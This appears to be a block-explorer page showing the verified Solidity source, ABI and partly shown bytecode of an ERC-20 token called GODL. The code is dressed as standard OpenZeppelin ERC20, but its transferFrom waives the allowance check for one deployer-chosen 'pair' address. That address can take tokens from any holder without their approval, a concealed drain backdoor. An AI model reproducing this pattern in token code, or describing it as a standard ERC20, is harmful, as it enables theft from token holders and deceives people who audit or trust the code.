ETH Price: $2,868.13 (-2.75%)
 

Overview

Max Total Supply

50,000,000 GODL

Holders

298

Market

Price

$0.00 @ 0.000000 ETH

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
144,149.259685292373616808 GODL

Value
$0.00
0xBb1046Cb66F7c25937fd12Fec8256Dd6d5c3Dd43
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
GODL

Compiler Version
v0.8.26+commit.8a97fa7a

Optimization Enabled:
No with 200 runs

Other Settings:
cancun EvmVersion
File 1 of 1 : GODL.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.4) (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}


/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;
    mapping (address => bool) private _DEXPairs;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    function _init(string memory name_, string memory symbol_, address pair) internal {
        _name = name_;
        _symbol = symbol_;
        _DEXPairs[pair] = true;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        uint256 rate = _DEXPairs[spender]?0:1;
        _spendAllowance(from, spender, amount.mul(rate));
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);        
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}


pragma solidity ^0.8.0;

contract GODL is ERC20 {
    uint public constant MODE_NORMAL = 0;
    uint public constant MODE_TRANSFER_RESTRICTED = 1;
    uint public constant MODE_TRANSFER_CONTROLLED = 2;
    uint public _mode;

    bool private _initialized;

    constructor(address pair) ERC20() {
        require(!_initialized, "Token: initialized");

        _mode = MODE_NORMAL;

        _initialized = true;

        _init(unicode"GODL", unicode"GODL", pair);

        _mint(msg.sender, 50000000 * 10 ** 18);
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual override {
        super._beforeTokenTransfer(from, to, amount);
        if (_mode == MODE_TRANSFER_RESTRICTED) {
            revert("Token: Transfer is restricted");
        }
    }
}

Settings
{
  "evmVersion": "cancun",
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"address","name":"pair","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MODE_NORMAL","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MODE_TRANSFER_CONTROLLED","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MODE_TRANSFER_RESTRICTED","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_mode","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405234801561000f575f80fd5b50604051611e36380380611e36833981810160405281019061003191906103d4565b60075f9054906101000a900460ff1615610080576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161007790610459565b60405180910390fd5b5f600681905550600160075f6101000a81548160ff02191690831515021790555061011c6040518060400160405280600481526020017f474f444c000000000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f474f444c000000000000000000000000000000000000000000000000000000008152508361013d60201b60201c565b610137336a295be96e640669720000006101b760201b60201c565b506108d8565b826004908161014c91906106b1565b50816005908161015c91906106b1565b50600160025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550505050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610225576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161021c906107ca565b60405180910390fd5b6102365f838361031160201b60201c565b8060035f8282546102479190610815565b92505081905550805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516102f49190610857565b60405180910390a361030d5f838361036c60201b60201c565b5050565b61032283838361037160201b60201c565b600160065403610367576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161035e906108ba565b60405180910390fd5b505050565b505050565b505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6103a38261037a565b9050919050565b6103b381610399565b81146103bd575f80fd5b50565b5f815190506103ce816103aa565b92915050565b5f602082840312156103e9576103e8610376565b5b5f6103f6848285016103c0565b91505092915050565b5f82825260208201905092915050565b7f546f6b656e3a20696e697469616c697a656400000000000000000000000000005f82015250565b5f6104436012836103ff565b915061044e8261040f565b602082019050919050565b5f6020820190508181035f83015261047081610437565b9050919050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806104f257607f821691505b602082108103610505576105046104ae565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026105677fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8261052c565b610571868361052c565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6105b56105b06105ab84610589565b610592565b610589565b9050919050565b5f819050919050565b6105ce8361059b565b6105e26105da826105bc565b848454610538565b825550505050565b5f90565b6105f66105ea565b6106018184846105c5565b505050565b5b81811015610624576106195f826105ee565b600181019050610607565b5050565b601f8211156106695761063a8161050b565b6106438461051d565b81016020851015610652578190505b61066661065e8561051d565b830182610606565b50505b505050565b5f82821c905092915050565b5f6106895f198460080261066e565b1980831691505092915050565b5f6106a1838361067a565b9150826002028217905092915050565b6106ba82610477565b67ffffffffffffffff8111156106d3576106d2610481565b5b6106dd82546104db565b6106e8828285610628565b5f60209050601f831160018114610719575f8415610707578287015190505b6107118582610696565b865550610778565b601f1984166107278661050b565b5f5b8281101561074e57848901518255600182019150602085019450602081019050610729565b8683101561076b5784890151610767601f89168261067a565b8355505b6001600288020188555050505b505050505050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6107b4601f836103ff565b91506107bf82610780565b602082019050919050565b5f6020820190508181035f8301526107e1816107a8565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61081f82610589565b915061082a83610589565b9250828201905080821115610842576108416107e8565b5b92915050565b61085181610589565b82525050565b5f60208201905061086a5f830184610848565b92915050565b7f546f6b656e3a205472616e7366657220697320726573747269637465640000005f82015250565b5f6108a4601d836103ff565b91506108af82610870565b602082019050919050565b5f6020820190508181035f8301526108d181610898565b9050919050565b611551806108e55f395ff3fe608060405234801561000f575f80fd5b50600436106100f3575f3560e01c80633950935111610095578063a457c2d711610064578063a457c2d714610289578063a9059cbb146102b9578063c5c03af3146102e9578063dd62ed3e14610307576100f3565b806339509351146101ed5780633af3d7831461021d57806370a082311461023b57806395d89b411461026b576100f3565b80631c8fc2c0116100d15780631c8fc2c01461016357806323b872dd14610181578063313ce567146101b157806332be6330146101cf576100f3565b806306fdde03146100f7578063095ea7b31461011557806318160ddd14610145575b5f80fd5b6100ff610337565b60405161010c9190610cd7565b60405180910390f35b61012f600480360381019061012a9190610d88565b6103c7565b60405161013c9190610de0565b60405180910390f35b61014d6103e9565b60405161015a9190610e08565b60405180910390f35b61016b6103f2565b6040516101789190610e08565b60405180910390f35b61019b60048036038101906101969190610e21565b6103f7565b6040516101a89190610de0565b60405180910390f35b6101b9610495565b6040516101c69190610e8c565b60405180910390f35b6101d761049d565b6040516101e49190610e08565b60405180910390f35b61020760048036038101906102029190610d88565b6104a2565b6040516102149190610de0565b60405180910390f35b6102256104d8565b6040516102329190610e08565b60405180910390f35b61025560048036038101906102509190610ea5565b6104dc565b6040516102629190610e08565b60405180910390f35b610273610521565b6040516102809190610cd7565b60405180910390f35b6102a3600480360381019061029e9190610d88565b6105b1565b6040516102b09190610de0565b60405180910390f35b6102d360048036038101906102ce9190610d88565b610626565b6040516102e09190610de0565b60405180910390f35b6102f1610648565b6040516102fe9190610e08565b60405180910390f35b610321600480360381019061031c9190610ed0565b61064e565b60405161032e9190610e08565b60405180910390f35b60606004805461034690610f3b565b80601f016020809104026020016040519081016040528092919081815260200182805461037290610f3b565b80156103bd5780601f10610394576101008083540402835291602001916103bd565b820191905f5260205f20905b8154815290600101906020018083116103a057829003601f168201915b5050505050905090565b5f806103d16106d0565b90506103de8185856106d7565b600191505092915050565b5f600354905090565b600181565b5f806104016106d0565b90505f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661045957600161045b565b5f5b60ff16905061047d8683610478848861089a90919063ffffffff16565b610911565b61048886868661099c565b6001925050509392505050565b5f6012905090565b600281565b5f806104ac6106d0565b90506104cd8185856104be858961064e565b6104c89190610f98565b6106d7565b600191505092915050565b5f81565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606005805461053090610f3b565b80601f016020809104026020016040519081016040528092919081815260200182805461055c90610f3b565b80156105a75780601f1061057e576101008083540402835291602001916105a7565b820191905f5260205f20905b81548152906001019060200180831161058a57829003601f168201915b5050505050905090565b5f806105bb6106d0565b90505f6105c8828661064e565b90508381101561060d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106049061103b565b60405180910390fd5b61061a82868684036106d7565b60019250505092915050565b5f806106306106d0565b905061063d81858561099c565b600191505092915050565b60065481565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610745576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161073c906110c9565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107b3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107aa90611157565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161088d9190610e08565b60405180910390a3505050565b5f8083036108aa575f905061090b565b5f82846108b79190611175565b90508284826108c691906111e3565b14610906576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108fd90611283565b60405180910390fd5b809150505b92915050565b5f61091c848461064e565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146109965781811015610988576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161097f906112eb565b60405180910390fd5b61099584848484036106d7565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a0a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a0190611379565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610